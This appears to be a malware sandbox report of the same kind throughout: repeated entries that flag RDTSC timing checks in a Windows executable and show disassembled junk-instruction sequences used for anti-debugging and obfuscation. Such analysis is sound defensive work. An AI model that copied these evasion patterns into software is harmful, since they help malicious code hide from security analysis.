Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB7415 second address: EB7423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA0AD45510Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EBC6C2 second address: EBC6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FA0AD4759D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EBC6D3 second address: EBC6D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EBC6D7 second address: EBC6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E0854A second address: E08553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC43F2 second address: EC43F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC27D7 second address: EC27DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC33D0 second address: EC33D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC3B60 second address: EC3B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FA0AD45511Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC3B72 second address: EC3B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759DFh 0x00000009 jmp 00007FA0AD4759E4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC3B99 second address: EC3BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA0AD455106h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC3BA5 second address: EC3BB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC3BB1 second address: EC3BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC42A2 second address: EC42AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EC42AB second address: EC42D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA0AD455106h 0x00000008 jmp 00007FA0AD45510Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FA0AD45510Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ECB4BD second address: ECB4DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA0AD4759DEh 0x0000000c push edx 0x0000000d jo 00007FA0AD4759D6h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ECB4DD second address: ECB503 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnc 00007FA0AD455106h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FA0AD45510Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ECB503 second address: ECB51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA0AD4759E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ED6738 second address: ED6753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA0AD455116h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ED6753 second address: ED6759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ED6759 second address: ED675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: ED675D second address: ED6766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EDE632 second address: EDE64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD45510Ah 0x00000009 popad 0x0000000a jl 00007FA0AD45510Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBDFE second address: EEBE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBE02 second address: EEBE16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FA0AD455106h 0x0000000b popad 0x0000000c jo 00007FA0AD455112h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBC37 second address: EEBC3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBC3B second address: EEBC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455113h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FA0AD455120h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBC5C second address: EEBC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759E4h 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EEBC7A second address: EEBC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3B8E second address: EF3B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E3C second address: EF3E4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E4A second address: EF3E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E4E second address: EF3E85 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 jp 00007FA0AD455112h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA0AD455112h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E85 second address: EF3E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E89 second address: EF3E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF3E92 second address: EF3EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759E5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF4011 second address: EF4015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF4015 second address: EF402D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FA0AD4759D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FA0AD4759D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF402D second address: EF4033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF4033 second address: EF4037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF41BB second address: EF41C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF41C8 second address: EF41E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA0AD4759E7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF8201 second address: EF821A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Ch 0x00000007 jo 00007FA0AD455106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EF821A second address: EF823A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA0AD4759E6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EFAAEC second address: EFAAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F0719E second address: F071A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F071A2 second address: F071B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD45510Fh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F07029 second address: F0702F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F0702F second address: F07033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F07033 second address: F07039 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F0AAE9 second address: F0AAFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F05579 second address: F0557F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F188CB second address: F188D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F18A31 second address: F18A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F30C83 second address: F30C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F30F2D second address: F30F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F3108F second address: F31099 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA0AD455106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F31605 second address: F31622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA0AD4759E8h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F31622 second address: F31627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F31627 second address: F31633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA0AD4759D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: F3786B second address: F37881 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007FA0AD455106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007FA0AD455106h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B902D4 second address: 4B902F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 call 00007FA0AD4759E3h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B902F7 second address: 4B902FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B902FB second address: 4B902FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B902FF second address: 4B90305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90305 second address: 4B9031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov edx, 33711846h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov edx, 30F228CCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B9031E second address: 4B90366 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 557F05B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA0AD455111h 0x0000000f or eax, 04A231A6h 0x00000015 jmp 00007FA0AD455111h 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007FA0AD45510Eh 0x00000023 pop ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B90366 second address: 4B9036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80023 second address: 4B80029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80029 second address: 4B8002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B8002D second address: 4B80044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a movsx edx, si 0x0000000d popad 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80044 second address: 4B80048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B80048 second address: 4B8004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0F38 second address: 4BB0F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0F3E second address: 4BB0F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0F42 second address: 4BB0F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA0AD4759DAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0F58 second address: 4BB0F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0F5C second address: 4BB0FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA0AD4759E0h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FA0AD4759DBh 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 movzx eax, dx 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007FA0AD4759E8h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA0AD4759E7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0FBC second address: 4BB0FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0FC2 second address: 4BB0FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4BB0FC6 second address: 4BB0FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50195 second address: 4B5019A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B5019A second address: 4B501B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 7DB0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA0AD45510Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B501B3 second address: 4B50252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA0AD4759DCh 0x00000013 add ecx, 50DFD858h 0x00000019 jmp 00007FA0AD4759DBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FA0AD4759E8h 0x00000025 or ax, 62B8h 0x0000002a jmp 00007FA0AD4759DBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FA0AD4759E6h 0x00000038 push dword ptr [ebp+04h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FA0AD4759E7h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B50252 second address: 4B502A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA0AD45510Fh 0x00000009 adc ax, 068Eh 0x0000000e jmp 00007FA0AD455119h 0x00000013 popfd 0x00000014 jmp 00007FA0AD455110h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B502A3 second address: 4B502A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B502A9 second address: 4B502AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70D38 second address: 4B70D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70D3D second address: 4B70D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA0AD45510Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA0AD45510Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70D72 second address: 4B70DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, E3h 0x00000005 pushfd 0x00000006 jmp 00007FA0AD4759DAh 0x0000000b jmp 00007FA0AD4759E5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov edi, esi 0x00000018 jmp 00007FA0AD4759E8h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov ebx, eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: 4B70DBF second address: 4B70DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
